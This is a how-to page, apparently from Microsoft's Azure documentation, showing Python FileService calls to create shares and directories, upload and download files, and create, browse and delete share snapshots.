(none)
Return value
A shared_ptr which shares ownership of the owned object.
Exceptions
Example
Run this code
#include <iostream>
#include <memory>
#include <thread>

typedef std::shared_ptr<int> IntPtr;
typedef std::weak_ptr<int> IntWeakPtr;

void observe(IntWeakPtr pWeak)
{
    IntPtr pObserve(pWeak.lock());
    if (pObserve) {
        std::cout << "\tobserve() able to lock weak_ptr<>, value=" << *pObserve << "\n";
    } else {
        std::cout << "\tobserve() unable to lock weak_ptr<>\n";
    }
}

int main()
{
    IntWeakPtr pWeak;
    std::cout << "weak_ptr<> not yet initialized\n";
    observe(pWeak);

    {
        IntPtr pShared(new int(42));
        pWeak = pShared;
        std::cout << "weak_ptr<> initialized with shared_ptr.\n";
        observe(pWeak);
    }

    std::cout << "shared_ptr<> has been destructed due to scope exit.\n";
    observe(pWeak);
}
Output:
weak_ptr<> not yet initialized observe() unable to lock weak_ptr<> weak_ptr<> initialized with shared_ptr. observe() able to lock weak_ptr<>, value=42 shared_ptr<> has been destructed due to scope exit. observe() unable to lock weak_ptr<>
|
http://en.cppreference.com/mwiki/index.php?title=cpp/memory/weak_ptr/lock&oldid=46733
|
CC-MAIN-2015-18
|
en
|
refinedweb
|
#include <Xm/Xm.h> to provide a compound string, to be included in the compound string being created whenever the pattern is matched.
An application uses a resource-style interface to specify components for an XmParseMapping. XmParseMappingCreate creates a parse mapping, using a resource-style argument list. XmParseMappingGetValues and XmParseMappingSetValues retrieve and set the components of a parse mapping. XmParseMappingFree recovers memory used by a parse mapping. XmParseTable is an array of XmParseMapping objects.
The XmNinvokeParseProc resource is a function of type XmParseProc, which is defined as follows:
XmIncludeStatus (*XmParseProc) (text_in_out, text_end, type, tag,
        entry, pattern_length, str_include, call_data)
        XtPointer       *text_in_out;
        XtPointer       text_end;
        XmTextType      type;
        XmStringTag     tag;
        XmParseMapping  entry;
        int             pattern_length;
        XmString        *str_include;
        XtPointer       call_data;
A parse procedure provides an escape mechanism for arbitrarily complex parsing. This procedure is invoked when a pattern in the input text is matched with a pattern in a parse mapping whose XmNincludeStatus is XmINVOKE.
The input text is a pointer to the first byte of the pattern that was matched to trigger the call to the parse procedure. The parse procedure consumes as many bytes of the input string as it needs and sets the input text pointer to the following byte. It returns a compound string to be included in the compound string being constructed, and it also returns an XmIncludeStatus indicating how the returned compound string should be handled. If the parse procedure does not set the input text pointer ahead by at least one byte, the parsing routine continues trying to match the input text with the patterns in the remaining parse mappings in the parse table. Otherwise, the parsing routine begins with the new input text pointer and tries to match the input text with patterns in the parse mappings starting at the beginning of the parse table.
The parse procedure returns an XmIncludeStatus indicating how str_include is to be included in the compound string being constructed. Following are the possible values:).
XmParseMappingCreate(3), XmParseMappingFree(3), XmParseMappingGetValues(3), XmParseMappingSetValues(3), XmParseTable(3), and XmString(3).
|
http://www.makelinux.net/man/3/X/XmParseMapping
|
CC-MAIN-2015-18
|
en
|
refinedweb
|
08 July 2011 19:51 [Source: ICIS news]
TORONTO (ICIS)--Canexus has completed its conversion from income fund to corporation status, the Canadian chlor-alkali and sodium chlorate producer said on Friday.
Canexus said the move will not involve any changes to the way it runs its chemical businesses.
The company expects to start trading its shares on the
Canadian income funds have become less attractive following changes in tax laws that were first announced in 2006 and brought into effect this year.
However, another Canadian chemicals firm, Chemtrade Logistics, has said it will continue to operate as an income fund as it believes the tax impact on its business will only
|
http://www.icis.com/Articles/2011/07/08/9476303/canexus-completes-conversion-to-corporation-status.html
|
CC-MAIN-2015-18
|
en
|
refinedweb
|
from BeautifulSoup import BeautifulSoup
import urllib2
from BeautifulSoup import BeautifulSoup
event_url = ''
soup = BeautifulSoup(urllib2.urlopen(event_url))
event_info = soup.findAll("dl", { "class" : "clearfix" })
s = BeautifulSoup(str(event_info))
l = s.findAll("dt")
for dt in l:
print dt
<dt>Where:</dt>
<dt> </dt>
<dt>When:</dt>
<dt> </dt>
<dt>Website:</dt>
<dt>Contact:</dt>
for dt in l:
m = dt.replace('<dt>', '')
clear_dt = m.replace('</dt>', '')
print clear_dt #print as string without <dt> & </dt>
Statistics: Posted by yuyb0y — Sat Apr 18, 2015 11:34 am
>>> import re
>>> s = '\t\t24\t\tblah blah blah\t\t56\t\t'
>>> re.sub(r'(\t\t[0-9]{1,3}\t\t)', r'TEXT\1', s)
'TEXT\t\t24\t\tblah blah blahTEXT\t\t56\t\t'
Statistics: Posted by stranac — Sat Apr 18, 2015 10:12 am
Statistics: Posted by stranac — Sat Apr 18, 2015 10:02 am
Statistics: Posted by Skaperen — Sat Apr 18, 2015 9:58 am
Statistics: Posted by Skaperen — Sat Apr 18, 2015 9:53 am
pritesh wrote:
Skaperen - You've mentioned that I should learn Python 3. But if all the modules I need are still not ported to Python 3. Hence my choice of Python 2. Please let me know if it's otherwise.
Statistics: Posted by Skaperen — Sat Apr 18, 2015 9:45 am
Kebap wrote:
Seems legit, if you do not want to convert any scripts for now. Still valueable information may be in documents written for this purpose. These documents also list the differences you search, reasons for the version switch, etc. Just ignore the other parts..
Source:
Statistics: Posted by Skaperen — Sat Apr 18, 2015 9:35 am
import urllib2
from bs4 import BeautifulSoup
event_url = ''
soup = BeautifulSoup(urllib2.urlopen(event_url))
event_info = soup.find('dl', class_='clearfix')
if event_info:
dt_list = [dt.text.strip() for dt in event_info.find_all('dt')]
print dt_list
Statistics: Posted by buran — Sat Apr 18, 2015 6:55 am
Statistics: Posted by pritesh — Sat Apr 18, 2015 6:23 am
Abbeville TX
Bakerhill TX
Abernant GA
Bangor GA
Alabaster AL
Berry AL
Alabaster AL
Berry AL
Abernant GA
Bangor GA
Abbeville TX
Bakerhill TX
Statistics: Posted by farook — Sat Apr 18, 2015 5:56 am
Statistics: Posted by blackystrat — Sat Apr 18, 2015 5:04 am
from __future__ import division
def wave1(lamb, conv):
v = (299792458)/lamb
E = (6.62606957E-34) * v
if conv == "joules":
print "The frequency is",v,"in Hz, and the energy is",E,"in joules."
elif conv == "eV":
print "The frequency is",v,"in Hz and the energy is", E/(1.602E-19),"in eV."
elif conv == "e_mass":
print "The frequency is",v,"in Hz and the energy is",(E/(1.602E-19)) * 5.11E6,"in electron mass."
else:
print "Might want to check your spelling."
Statistics: Posted by Fred Barclay — Fri Apr 17, 2015 11:36 pm
Statistics: Posted by Fred Barclay — Fri Apr 17, 2015 11:30 pm
Statistics: Posted by Jonty — Fri Apr 17, 2015 11:26 pm
Heading 1, Heading 2, Heading 3, Average, Statistical analysis
1, 4, 7, Average of this row, statistical analysis
2, 5, 8, Average of this row, statistical analysis
3, 6, 9, Average of this row, statistical analysis
Statistics: Posted by pynew — Fri Apr 17, 2015 11:21 pm
|
http://www.python-forum.org/feed.php
|
CC-MAIN-2015-18
|
en
|
refinedweb
|
Revision 2
Last updated: February 17, 2013
compatibility@android.com
Table of Contents
2. Resources
3. Software
3.2. Soft API Compatibility
3.2.2. Build Parameters
3.2.3. Intent Compatibility
3.4. Web Compatibility
3.5. API Behavioral Compatibility
3.6. API Namespaces
3.7. Virtual Machine Compatibility
3.8. User Interface Compatibility
3.8.2. Notifications
3.8.3. Search
3.8.4. Toasts
3.8.5. Themes
3.8.6. Live Wallpapers
3.8.7. Recent Application Display
3.8.8. Input Management Settings
3.8.9. Lock and Home Screen Widgets
3.8.10. Lock Screen Media Remote Control
3.8.11. Dreams
3.10 Accessibility
3.11 Text-to-Speech
5. Multimedia Compatibility
5.2. Video Encoding
5.3. Video Decoding
5.4. Audio Recording
5.5. Audio Latency
5.6. Network Protocols
7. Hardware Compatibility
7.1.2. Display Metrics
7.1.3. Screen Orientation
7.1.4. 2D and 3D Graphics Acceleration
7.1.5. Legacy Application Compatibility Mode
7.1.6. Screen Types
7.1.7. Screen Technology
7.1.8. External Displays
7.2.2. Non-touch Navigation
7.2.3. Navigation Keys
7.2.4. Touchscreen Input
7.3.2. Magnetometer
7.3.3. GPS
7.3.4. Gyroscope
7.3.5. Barometer
7.3.6. Thermometer
7.3.7. Photometer
7.3.8. Proximity Sensor
7.4.2. IEEE 802.11 (Wi-Fi)
7.4.3. Bluetooth
7.4.4. Near-Field Communications
7.4.5. Minimum Network Capability
7.5.2. Front-Facing Camera
7.5.3. Camera API Behavior
7.5.4. Camera Orientation
7.7. USB
9. Security Model Compatibility
9.2. UIDs and Process Isolation
9.3. Filesystem Permissions
9.4. Alternate Execution Environments
9.5. Multi-User Support
9.6. Premium SMS Warning
11. Updatable Software
12. Contact Us
Appendix A - Bluetooth Test Procedure
1. Introduction
This document enumerates the requirements that must be met in order for devices to be compatible with Android 4.2.
The use of "must", "must not", "required", "shall", "shall not", "should", "should not", "recommended", "may", and "optional" is per the IETF standard defined in RFC2119 [Resources, 1].
As used in this document, a "device implementer" or "implementer" is a person or organization developing a hardware/software solution running Android 4.2. A "device implementation" or "implementation" is the hardware/software solution so developed.
To be considered compatible with Android 4.2, device implementations MUST meet the requirements presented in this Compatibility Definition, including any documents incorporated via reference.
Where this definition or the software tests described in Section 10 is silent, ambiguous, or incomplete, it is the responsibility of the device implementer to ensure compatibility with existing implementations.
For this reason, the Android Open Source Project [Resources, 3] is both the reference and preferred implementation of Android. Device implementers are strongly encouraged to base their implementations to the greatest extent possible on the "upstream" source code available from the Android Open Source Project. While some components can hypothetically be replaced with alternate implementations, this practice is strongly discouraged, as passing the software tests will become substantially more difficult. It is the implementer's responsibility to ensure full behavioral compatibility with the standard Android implementation, including and beyond the Compatibility Test Suite. Finally, note that certain component substitutions and modifications are explicitly forbidden by this document.
2. Resources
- IETF RFC2119 Requirement Levels:
- Android Compatibility Program Overview:
- Android Open Source Project:
- API definitions and documentation:
- Android Permissions reference:
- android.os.Build reference:
- Android 4.2 allowed version strings:
- Renderscript:
- Hardware Acceleration:
- android.webkit.WebView class:
- HTML5:
- HTML5 offline capabilities:
- HTML5 video tag:
- HTML5/W3C geolocation API:
- HTML5/W3C webdatabase API:
- HTML5/W3C IndexedDB API:
- Dalvik Virtual Machine specification: available in the Android source code, at dalvik/docs
- AppWidgets:
- Notifications:
- Application Resources:
- Status Bar icon style guide:
- Search Manager:
- Toasts:
- Themes:
- R.style class:
- Live Wallpapers:
- Android Device Administration:
- DevicePolicyManager reference:
- Android Accessibility Service APIs:
- Android Accessibility APIs:
- Eyes Free project:
- Text-To-Speech APIs:
- Reference tool documentation (for adb, aapt, ddms, systrace):
- Android apk file description:
- Manifest files:
- Monkey testing tool:
- Android android.content.pm.PackageManager class and Hardware Features List:
- Supporting Multiple Screens:
- android.util.DisplayMetrics:
- android.content.res.Configuration:
- android.hardware.SensorEvent:
- Bluetooth API:
-:
- Camera orientation API:
- Camera:
- Android Open Accessories:
- USB Host API:
- Android Security and Permissions reference:
- Apps for Android:
- Android DownloadManager:
- Android File Transfer:
- Android Media Formats:
- HTTP Live Streaming Draft Protocol:
- NFC Connection Handover:
- Bluetooth Secure Simple Pairing Using NFC:
- Wifi Multicast API:
- Action Assist:
- USB Charging Specification:
- Android Beam:
- Android USB Audio:
- Android NFC Sharing Settings:
- Wifi Direct (Wifi P2P):
- Lock and Home Screen Widget:
- UserManager reference:
- External Storage reference:
- External Storage APIs:
- SMS Short Code:
- Media Remote Control Client:
- Display Manager:
- Dreams:
- Android Application Development-Related Settings:
Many of these resources are derived directly or indirectly from the Android 4.2 SDK, and will be functionally identical to the information in that SDK's documentation. In any case where this Compatibility Definition or the Compatibility Test Suite disagrees with the SDK documentation, the SDK documentation is considered authoritative. Any technical details provided in the references included above are considered by inclusion to be part of this Compatibility Definition.
3. Software
3.1. Managed API Compatibility
The managed (Dalvik-based) execution environment is the primary vehicle for Android applications. The Android application programming interface (API) is the set of Android platform interfaces exposed to applications running in the managed VM environment. Device implementations MUST provide complete implementations, including all documented behaviors, of any documented API exposed by the Android 4.2 SDK [Resources, 4].
Device implementations MUST NOT omit any managed APIs, alter API interfaces or signatures, deviate from the documented behavior, or include no-ops, except where specifically allowed by this Compatibility Definition.
This Compatibility Definition permits some types of hardware for which Android includes APIs to be omitted by device implementations. In such cases, the APIs MUST still be present and behave in a reasonable way. See Section 7 for the specific requirements for this scenario.
3.2. Soft API Compatibility
In addition to the managed APIs from Section 3.1, Android also includes a significant runtime-only "soft" API, in the form of such things as Intents, permissions, and similar aspects of Android applications that cannot be enforced at application compile time.
3.2.1. Permissions
Device implementers MUST support and enforce all permission constants as documented by the Permission reference page [Resources, 5]. Note that Section 10 lists additional requirements related to the Android security model.
3.2.2. Build Parameters
The Android APIs include a number of constants on the android.os.Build class [Resources, 6] that are intended to describe the current device. To provide consistent, meaningful values across device implementations, the table below includes additional restrictions on the formats of these values to which device implementations MUST conform.
3.2.3. Intent Compatibility
Device implementations MUST honor Android's loose-coupling Intent system, as described in the sections below. By "honored", it is meant that the device implementer MUST provide an Android Activity or Service that specifies a matching Intent filter, and that binds to and implements correct behavior for each specified Intent pattern.
3.2.3.1. Core Application Intents
The Android upstream project defines a number of core applications, such as contacts, calendar, photo gallery, music player, and so on. Device implementers MAY replace these applications with alternative versions.
However, any such alternative versions MUST honor the same Intent patterns provided by the upstream project. For example, if a device contains an alternative music player, it must still honor the Intent pattern issued by third-party applications to pick a song.
The following applications are considered core Android system applications:
- Desk Clock
- Browser
- Calendar
- Contacts
- Gallery
- Global Search
- Launcher
- Music
- Settings
The core Android system applications include various Activity or Service components that are considered "public". That is, the attribute "android:exported" may be absent, or may have the value "true".
For every Activity or Service defined in one of the core Android system applications that is not marked as non-public via an android:exported attribute with the value "false", device implementations MUST include a component of the same type implementing the same Intent filter patterns as the core Android system application.
In other words, a device implementation MAY replace core Android system applications; however, if it does, the device implementation MUST support all Intent patterns defined by each core Android system application being replaced.
3.2.3.2. Intent Overrides
As Android is an extensible platform, device implementations MUST allow each Intent pattern referenced in Section 3.2.3.2 to be overridden by third-party applications. The upstream Android open source implementation allows this by default; device implementers MUST NOT attach special privileges to system applications' use of these Intent patterns, or prevent third-party applications from binding to and assuming control of these patterns. This prohibition specifically includes, but is not limited to, disabling the "Chooser" user interface that allows the user to select between multiple applications that all handle the same Intent pattern.
However, device implementations MAY provide default activities for specific URI patterns (e.g.) if the default activity provides a more specific filter for the data URI. For example, an intent filter specifying the data URI "" is more specific than the browser filter for "http://". Device implementations MUST provide a user interface for users to modify the default activity for intents.
3.2.3.3. Intent Namespaces
Device implementations MUST NOT include any Android component that honors any new Intent or Broadcast Intent patterns using an ACTION, CATEGORY, or other key string in the android.* or com.android.* namespace. Device implementers MUST NOT include any Android components that honor any new Intent or Broadcast Intent patterns using an ACTION, CATEGORY, or other key string in a package space belonging to another organization. Device implementers MUST NOT alter or extend any of the Intent patterns used by the core apps listed in Section 3.2.3.1. Device implementations MAY include Intent patterns using namespaces clearly and obviously associated with their own organization.
This prohibition is analogous to that specified for Java language classes in Section 3.6.
3.2.3.4. Broadcast Intents
Third-party applications rely on the platform to broadcast certain Intents to notify them of changes in the hardware or software environment. Android-compatible devices MUST broadcast the public broadcast Intents in response to appropriate system events. Broadcast Intents are described in the SDK documentation.
3.3. Native API Compatibility
3.3.1 Application Binary Interfaces
Managed code running in Dalvik can call into native code provided in the application .apk file as an ELF .so file compiled for the appropriate device hardware architecture. As native code is highly dependent on the underlying processor technology, Android defines a number of Application Binary Interfaces (ABIs) in the Android NDK, in the file docs/CPU-ARCH-ABIS.html. If a device implementation is compatible with one or more defined ABIs, it MUST implement compatibility with the Android NDK, as below.
If a device implementation includes support for an Android ABI, it:
- MUST include support for code running in the managed environment to call into native code, using the standard Java Native Interface (JNI) semantics.
- MUST be source-compatible (i.e. header compatible) and binary-compatible (for the ABI) with each required library in the list below
- MUST accurately report the native Application Binary Interface (ABI) supported by the device, via the android.os.Build.CPU_ABI API
- MUST report only those ABIs documented in the latest version of the Android NDK, in the file docs/CPU-ARCH-ABIS.txt
- SHOULD be built using the source code and header files available in the upstream Android Open Source Project
The following native code APIs MUST be available to apps that include native code:
- libc (C library)
- libm (math library)
- Minimal support for C++
- JNI interface
- liblog (Android logging)
- libz (Zlib compression)
- libdl (dynamic linker)
- libGLESv1_CM.so (OpenGL ES 1.0)
- libGLESv2.so (OpenGL ES 2.0)
- libEGL.so (native OpenGL surface management)
- libjnigraphics.so
- libOpenSLES.so (OpenSL ES 1.0.1 audio support)
- libOpenMAXAL.so (OpenMAX AL 1.0.1 support)
- libandroid.so (native Android activity support)
- Support for OpenGL, as described below
Note that future releases of the Android NDK may introduce support for additional ABIs. If a device implementation is not compatible with an existing predefined ABI, it MUST NOT report support for any ABIs at all.
Native code compatibility is challenging. For this reason, it should be repeated that device implementers are VERY strongly encouraged to use the upstream implementations of the libraries listed above to help ensure compatibility.
3.4. Web Compatibility
3.4.1. WebView Compatibility
The Android Open Source implementation uses the WebKit rendering engine to implement the android.webkit.WebView. Because it is not feasible to develop a comprehensive test suite for a web rendering system, device implementers MUST use the specific upstream build of WebKit in the WebView implementation. Specifically:
- Device implementations' android.webkit.WebView implementations MUST be based on the 534.30 WebKit build from the upstream Android Open Source tree for Android 4.2. This build includes a specific set of functionality and security fixes for the WebView. Device implementers MAY include customizations to the WebKit implementation; however, any such customizations MUST NOT alter the behavior of the WebView, including rendering behavior.
- The user agent string reported by the WebView MUST be in this format:
Mozilla/5.0 (Linux; U; Android $(VERSION); $(LOCALE); $(MODEL) Build/$(BUILD)) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.2 Mobile Safari/534.30
- The value of the $(VERSION) string MUST be the same as the value for android.os.Build.VERSION.RELEASE
- The value of the $(LOCALE) string SHOULD follow the ISO conventions for country code and language, and SHOULD refer to the current configured locale of the device
- The value of the $(MODEL) string MUST be the same as the value for android.os.Build.MODEL
- The value of the $(BUILD) string MUST be the same as the value for android.os.Build.ID
- Device implementations MAY omit Mobile in the user agent string
The WebView component:
-.
HTML5 APIs, like all JavaScript APIs, MUST be disabled by default in a WebView, unless the developer explicitly enables them via the usual Android APIs.
3.4.2. Browser Compatibility
Device implementations MUST include a standalone Browser application for general user web browsing. The standalone Browser MAY be based on a browser technology other than WebKit. However, even if an alternate Browser application is used, the android.webkit.WebView component provided to third-party applications MUST be based on WebKit, as described in Section 3.4.1.
Implementations MAY ship a custom user agent string in the standalone Browser application.
The standalone Browser application (whether based on the upstream WebKit Browser application or a third-party replacement).
3.5. API Behavioral Compatibility
The behaviors of each of the API types (managed, soft, native, and web) must be consistent with the preferred implementation of the upstream Android Open Source Project [Resources, 3]. Some specific areas of compatibility are:
- Devices MUST NOT change the behavior or semantics of a standard Intent
- Devices MUST NOT alter the lifecycle or lifecycle semantics of a particular type of system component (such as Service, Activity, ContentProvider, etc.)
- Devices MUST NOT change the semantics of a standard permission
The above list is not comprehensive. The Compatibility Test Suite (CTS) tests significant portions of the platform for behavioral compatibility, but not all of it. It is the responsibility of the implementer to ensure behavioral compatibility with the Android Open Source Project. For this reason, device implementers SHOULD use the source code available via the Android Open Source Project where possible, rather than re-implement significant parts of the system.
3.6. API Namespaces
Android follows the package and class namespace conventions defined by the Java programming language. To ensure compatibility with third-party applications, device implementers MUST NOT make any prohibited modifications (see below) to these package namespaces:
- java.*
- javax.*
- sun.*
- android.*
- com.android.*
Prohibited modifications include:
- Device implementations MUST NOT modify the publicly exposed APIs on the Android platform by changing any method or class signatures, or by removing classes or class fields.
- Device implementers MAY modify the underlying implementation of the APIs, but such modifications MUST NOT impact the stated behavior and Java-language signature of any publicly exposed APIs.
- Device implementers MUST NOT add any publicly exposed elements (such as classes or interfaces, or fields or methods to existing classes or interfaces) to the APIs above.
|
https://source.android.com/compatibility/4.2/android-4.2-cdd?hl=pt_br
|
CC-MAIN-2022-33
|
en
|
refinedweb
|
The IntegralConstant concept represents compile-time integral values.
The IntegralConstant concept represents objects that hold a constexpr value of an integral type. In other words, it describes the essential functionality provided by std::integral_constant. An IntegralConstant is also just a special kind of Constant whose inner value is of an integral type.
The requirements for being an IntegralConstant are quite simple. First, an IntegralConstant C must be a Constant such that Tag::value_type is an integral type, where Tag is the tag of C.
Secondly, C must have a nested static constexpr member named value, such that the following code is valid:
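A minimal sketch of what that requirement amounts to (using hana::int_c only to have a concrete model at hand; any IntegralConstant C would do):

#include <boost/hana.hpp>
#include <type_traits>
namespace hana = boost::hana;

// The type of hana::int_c<3> is a model of IntegralConstant.
using C = decltype(hana::int_c<3>);

constexpr auto v = C::value;                              // nested static constexpr member named value
static_assert(std::is_integral<decltype(v)>::value, "");  // and it is of an integral type
static_assert(v == 3, "");

int main() { }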
Because of the requirement that Tag::value_type be an integral type, it follows that C::value must be an integral value.
Finally, it is necessary to specialize the IntegralConstant template in the boost::hana namespace to tell Hana that a type is a model of IntegralConstant:
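A sketch of that specialization for a hypothetical user-defined tag (my_tag is an illustrative name, not part of the library):

#include <boost/hana.hpp>

struct my_tag;   // tag of some user-defined compile-time integer type

namespace boost { namespace hana {
    // Tell Hana that types with this tag model the IntegralConstant concept.
    template <>
    struct IntegralConstant<my_tag> {
        static constexpr bool value = true;
    };
}}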
Constant (free implementation of value)
The value function required to be a Constant can be implemented as follows for IntegralConstants:
The to function must still be provided explicitly for the model of Constant to be complete.
|
https://beta.boost.org/doc/libs/1_65_1/libs/hana/doc/html/structboost_1_1hana_1_1IntegralConstant.html
|
CC-MAIN-2022-33
|
en
|
refinedweb
|
start_logging(logfile='MDAnalysis.log', version='2.0.0-dev0')[source]
Start logging of messages to file and console.
The default logfile is named MDAnalysis.log and messages are logged with the tag MDAnalysis.
13.2.6.2. Other functions and classes for logging purposes¶
Changed in version 2.0.0: Deprecated MDAnalysis.lib.log.ProgressMeter has now been removed.
ProgressBar(*args, **kwargs)[source]
Display a visual progress bar and time estimate.
The ProgressBar decorates an iterable object, returning an iterator which acts exactly like the original iterable, but prints a dynamically updating progressbar every time a value is requested. See the example below for how to use it when iterating over the frames of a trajectory.
Example
To get a progress bar when analyzing a trajectory:
from MDAnalysis.lib.log import ProgressBar ... for ts in ProgressBar(u.trajectory): # perform analysis
will produce something similar to
30%|███████████ | 3/10 [00:13<00:30, 4.42s/it]
in a terminal or Jupyter notebook.
See also
The ProgressBar is derived from tqdm.auto.tqdm; see the tqdm documentation for further details on how to use it.
start_logging(logfile='MDAnalysis.log', version='2.0.0-dev0')[source]¶
Start logging of messages to file and console.
The default logfile is named MDAnalysis.log and messages are logged with the tag MDAnalysis.
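A minimal usage sketch (assuming a standard MDAnalysis installation; stop_logging is the companion call in the same module):

from MDAnalysis.lib.log import start_logging, stop_logging

start_logging(logfile="MDAnalysis.log")  # messages now go to the file and to the console
# ... run your analysis here ...
stop_logging()                           # remove the logging handlers when done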
|
https://docs.mdanalysis.org/2.0.0-dev0/documentation_pages/lib/log.html
|
CC-MAIN-2022-33
|
en
|
refinedweb
|
- 13 May, 2000 1 commit
- David Lawrence authored
"./rdata/in_1/a_1.c", line 178: warning(1184): possible use of "=" where "==" was intended "./rdata/in_1/a_1.c", line 179: warning(1184): possible use of "=" where "==" was intended By chaning them to ==, because (a) we don't allow side-effects in REQUIRE() and (b) it is clear from the rest of the code that it really was a test that was desired and not an assignment.
- 05 May, 2000 1 commit.
- 28 Apr, 2000 1 commit
- 27 Apr, 2000 2 commits
-
- 17 Mar, 2000 2 commits
- 03 Feb, 2000 1 commit
- 23 Dec, 1999 1 commit
- 15 Sep, 1999 1 commit
- 02 Sep, 1999 1 commit
- 31 Aug, 1999 1 commit
- 12 Aug, 1999 1 commit
- 02 Aug, 1999 1 commit
- 16 Jul,: ----------------------------------------------------------------------
- 09 Feb, 1999 1 commit
- 02 Feb, 1999 1 commit
- 30 Jan, 1999 1 commit
- 22 Jan, 1999 3 commits
Update Copyright dates.
converted frometext* to use gettoken() converted: result = foo(); if (result != DNS_R_SUCCESS) return (result); to RETERR(foo());
- 20 Jan, 1999 2 commits
txt_fromwire() was not coping with a zero length active buffer.
- 19 Jan, 1999 3 commits
totext/fromtext should all work towire/fromwire mostly work tostruct/fromstruct return DNS_R_NOTIMPLEMENTED compare untested
|
https://gitlab.isc.org/isc-projects/bind9/-/commits/44d74084fffab6b1746dede5d8b3b84be8ea04e9/lib/dns/rdata/in_1/a_1.c
|
CC-MAIN-2022-33
|
en
|
refinedweb
|
Bluetooth Low Energy TinyShield (ST) Tutorial
This tutorial will cover the basic operation of the BLE TinyShield using a standard TinyDuino and a Bluetooth-enabled device, such as a smartphone or tablet. To communicate with the stack, we will use the nRF UART v2.0 Android application and the nRF Connect iOS application. Click the link to download the application to your mobile device before starting the tutorial.
Once that is finished, we will start by adding files to our Arduino environment.
Learn more about the TinyDuino Platform
Description
Our Bluetooth Low Energy TinyShield is based on the ST SPBTLE-RF chipset.
To see what other TinyShields are compatible with this TinyShield, see the TinyShield Compatibility Matrix
Technical DetailsST SPBTLE-RF Specs:
- Fully Bluetooth v4.1 compliant
- Supports master and slave modes
- Multiple modes supported simultaneously
- Integrated Bluetooth Smart stack
- GAP, ATT/GATT, SM, L2CAP, LL, RFPHY
- Bluetooth Smart profiles
- Radio performance
- Integrated chip antenna
- TX power: +4 dBm
- Receiver sensitivity: -88 dBm
- Range: up to 20m
- Voltage: 3.0V - 5.5V
- Current:
- Transmit: 10.9mA (+4 dBm)
- Receive: 7.3mA (Standard mode)
- Down to 8.7µA average for 1s connection interval
- Down to 14.5µA average for 500ms connection interval
- Down to 26.1µA average for 250ms connection interval
- Down to 119.9µA average for 50ms connection interval
- Deep Sleep Mode: 1.7µA
- Due to the low current, this board can be run using the TinyDuino coin cell option
SPI Interface used
- 2 - SPI_IRQ: This signal is the interrupt output from the SPBTLE-RF to the TinyDuino.
- 9 - BT_RESET: This signal is the reset signal to the SPBTLE-RF.
- 10 - SPI_CS: This signal is the SPI chip select for the SPBTLE-RF.
- 11 - MOSI: This signal is the serial SPI data out of the TinyDuino and into the radio transceiver.
- 12 - MISO: This signal is the serial SPI data out of the radio transceiver and into the TinyDuino.
- 13 - SPI_CLK: This signal is the serial SPI clock out of the TinyDuino and into the radio transceiver.
- 20mm x 20mm (.787 inches x .787 inches)
- Max Height (from lower bottom TinyShield Connector to upper top TinyShield Connector): 5.11mm (0.201 inches)
- Weight: 1.49 grams (0.053 ounces)
Notes
- The interrupt signal can be changed from pin 2 to pin 3 by removing resistor R2 and soldering it to position R3.
Materials
Hardware
- A TinyDuino Processor Board
- TinyDuino and USB TinyShield OR
- TinyZero (The TinyZero will be used in this tutorial) OR
- TinyScreen+
- Micro USB Cable
- Bluetooth Low Energy TinyShield (ST) Optional: Battery (Recommended so you can go cord-free with this project)
- A smartphone, or some other means to use a Bluetooth application
- Optional: Battery
Software
- Arduino IDE
- STBLE library Example Program (This zip folder contains both the library and the example program we will be using)
- A phone application that can interface with Bluetooth objects:
- Android: nRF UART v2.0
- iOS: nRF Connect
- You can look for a different app, these were just the easiest (and free-est) we could find and test.
Hardware Assembly
All you have to do here is attach your processor board to the Bluetooth Low Energy TinyShield, as well as plugging in an optional battery if you intend to go wireless with your project:
Installing the STBLE Library
Click here to download STBLE.zip and the example program. After completing the download, open the Arduino IDE.
Select Sketch > Include Library > Add .ZIP Library. Navigate to your Downloads folder and select the folder STBLE.zip. Select "Open." The IDE should display a message that the library was added successfully.
Upload the Example Code
Restart the Arduino IDE (close it and reopen). Select File > Examples > STBLE > UARTPassThrough. This should open the code below:
Code
//-------------------------------------------------------------------------------
//  ... the nRF UART v2.0 app or another compatible BLE
//  terminal. This example is written specifically to be fairly code compatible
//  with the Nordic NRF8001 example, with a replacement UART.ino file with
//  'aci_loop' and 'BLEsetup' functions to allow easy replacement.
//
//  Written by Ben Rose, TinyCircuits
//
//-------------------------------------------------------------------------------

#include <SPI.h>
#include <STBLE.h>

//Debug output adds extra flash and memory requirements!
#ifndef BLE_DEBUG
#define BLE_DEBUG true
#endif

#if defined (ARDUINO_ARCH_AVR)
#define SerialMonitorInterface Serial
#elif defined(ARDUINO_ARCH_SAMD)
#define SerialMonitorInterface SerialUSB
#endif

uint8_t ble_rx_buffer[21];
uint8_t ble_rx_buffer_len = 0;
uint8_t ble_connection_state = false;
#define PIPE_UART_OVER_BTLE_UART_TX_TX 0

void setup() {
  SerialMonitorInterface.begin(9600);
  while (!SerialMonitorInterface); //This line will block until a serial monitor is opened with TinyScreen+!
  BLEsetup();
}

void loop() {
  aci_loop(); //Process any ACI commands or events from the NRF8001- main BLE handler, must run often. Keep main loop short.
  if (ble_rx_buffer_len) { //Check if data is available
    SerialMonitorInterface.print(ble_rx_buffer_len);
    SerialMonitorInterface.print(" : ");
    SerialMonitorInterface.println((char*)ble_rx_buffer);
    ble_rx_buffer_len = 0; //clear after reading
  }
  if (SerialMonitorInterface.available()) { //Check if serial input is available to send
    delay(10); //should catch input
    uint8_t sendBuffer[21];
    uint8_t sendLength = 0;
    while (SerialMonitorInterface.available() && sendLength < 19) {
      sendBuffer[sendLength] = SerialMonitorInterface.read();
      sendLength++;
    }
    if (SerialMonitorInterface.available()) {
      SerialMonitorInterface.print(F("Input truncated, dropped: "));
      if (SerialMonitorInterface.available()) {
        SerialMonitorInterface.write(SerialMonitorInterface.read());
      }
    }
    sendBuffer[sendLength] = '\0'; //Terminate string
    sendLength++;
    if (!lib_aci_send_data(PIPE_UART_OVER_BTLE_UART_TX_TX, (uint8_t*)sendBuffer, sendLength)) {
      SerialMonitorInterface.println(F("TX dropped!"));
    }
  }
}
With your processor board plugged in and powered on, upload the code. Then, open the Serial Monitor. You can find the option to open the Serial Monitor under the Tools tab, or you can directly open it by pressing the magnifying glass icon in the upper right corner of the IDE.
Your Serial Monitor should display something like this:
Put your phone in Discovery Mode for Bluetooth, because it's time to send some data between your phone and the TinyDuino stack!
Using the Android app
Open the nRF UART v2.0 application on your device. Enable Bluetooth connection.
Follow the images below to connect to the TinyDuino stack. The TinyShield should always appear as "BlueNRG."
